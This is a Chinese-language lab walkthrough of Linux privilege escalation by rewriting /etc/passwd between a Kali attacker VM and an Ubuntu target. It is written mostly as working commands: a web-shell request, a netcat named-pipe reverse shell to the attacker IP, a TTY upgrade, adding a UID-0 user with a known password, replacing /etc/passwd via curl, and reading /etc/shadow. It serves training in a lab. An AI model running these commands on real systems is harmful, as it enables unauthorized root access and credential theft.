Linux提权之passwd提权(七)
首先还是先来准备实验环境
我们的kail机 IP 192.168.25.138
我们的Ubuntu主机 ip 192.168.25.133
这个还是我们第六篇文章的的Ubuntu主机
通过网盘分享的文件:Ubuntu01.zip
链接: 百度网盘 请输入提取码 提取码: xj4p
--来自百度网盘超级会员v3的分享
首先还是一样的环境,(在此之前 如果第六篇跟着我一起做完了 实验环境没有关闭 我们还可以接着一起做 如果你按照这个做的话 记得 我们已经提权了 我们要退出 root 权限 输入 exit)
我们还是要
还是一样的我们先建立一个反弹shell
首先在我们的kail机上
输入
bash
nc -lvnp 8888
然后在我们的的本机windows上输入
http://192.168.25.133/cmd.php?cmd=system(%27id%27);
然后我们打开bp 进行抓包输入反弹shell
输入
cmd=system('rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.25.138+8888>/tmp/f');
不懂得或者忘了的 我们可以去看看第二篇
然后返回看kail主机
上里边已经有反弹shell
然后我们要获得完整的tty shell
python3 -c 'import pty;pty.spawn("/bin/bash")';
stty -echo raw
fg
bg
忘了的可以去看第二篇
好了我们要开始不一样的部分了
我们首先要退出root权限(如果是按照第六篇文章弄得)
然后我们查看
ls -al /*
这里因为我们要用passwd进行提权
所以我们要查看
ls -al /etc/passwd
-rw-rw-r-- 1 root root 2551 Oct 10 2021 /etc/passwd
这里看到我们没有修改权限
所以我们要增加权限
在Ubuntu目标主机上输入
sudo chmod 777 /etc/passwd
密码 123456
777不知道没关系 请看vcr
Linux权限详解(chmod、600、644、666、700、711、755、777、4755、6755、7755)_chmod 600-CSDN博客
然后我们再来查看
任何用户都有权限访问了
现在我们就开始增加用户
cat /etc/passwd
复制 新建一个passwd文件
然后粘贴到里边
然后
通过OpenSSL passwd生成一个新的用户hacker,密码为123456
openssl passwd -1 -salt hacker 123456
不懂得 可以看这篇文章
(6) openssl passwd(生成加密的密码) - 苦咖啡~~ - 博客园
$1$hacker$6luIRwdGpBvXdP.GMwcZp/
然后把该用户加入 passwd 加入root权限
仿照root写法
root:x:0:0:root:/root:/bin/bash
hacker:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0:/root:/bin/bash
完事我们直接保存
然后我们就要下载这个文件到Ubuntu主机
把这个文件覆盖到Ubuntu主机上的passwd文件
curl http://192.168.25.138/passwd -o /etc/passwd
查看文件 已经被替换了
然后我们可以通过 su
命令切换到hacker 用户
输入id 发现是root权限
也是可以访问 只有root用户可以访问的文件
cat /etc/shadow
同时我还可以进行远程登陆
ssh hacker@192.168.25.133
并且输入密码 123456
发现 id 也是root
这里希望你不要推出 紧接着去做第八篇文章